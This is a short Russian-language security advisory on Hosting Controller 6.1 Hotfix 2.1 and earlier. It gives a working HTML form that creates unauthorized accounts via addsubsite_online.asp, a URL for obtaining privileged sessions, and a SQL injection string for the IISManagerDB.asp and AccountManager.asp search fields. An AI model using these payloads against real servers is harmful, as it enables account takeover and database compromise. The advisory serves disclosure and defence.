Программа: Hosting Controller 6.1 Hotfix 2.1 и более ранние версии
Обнаруженные уязвимости позволяют удаленному авторизованному пользователю обойти ограничения безопасности и выполнить произвольные SQL команды в базе данных приложения.
1. Удаленный авторизованный пользователь может послать сценарию '/admin/hosting/addsubsite_online.asp' специально сформированный POST запрос и создать новую учетную запись в приложении.
Пример:
<FORM action="http://[target]/admin/hosting/addsubsite_online.asp"
method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM>
2. Удаленный авторизованный пользователь может создать сессию со специальными привилегиями с помощью URL:
http://[target]/admin/hosting/dsp_newreseller.asp
3. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в полях формы поиска в сценариях 'IISManagerDB.asp' и 'AccountManager.asp'. Удаленный авторизованный пользователь может послать специально сформированный запрос и выполнить произвольные SQL команды в базе данных приложения. Пример:
'or'1'='1'or'1'='1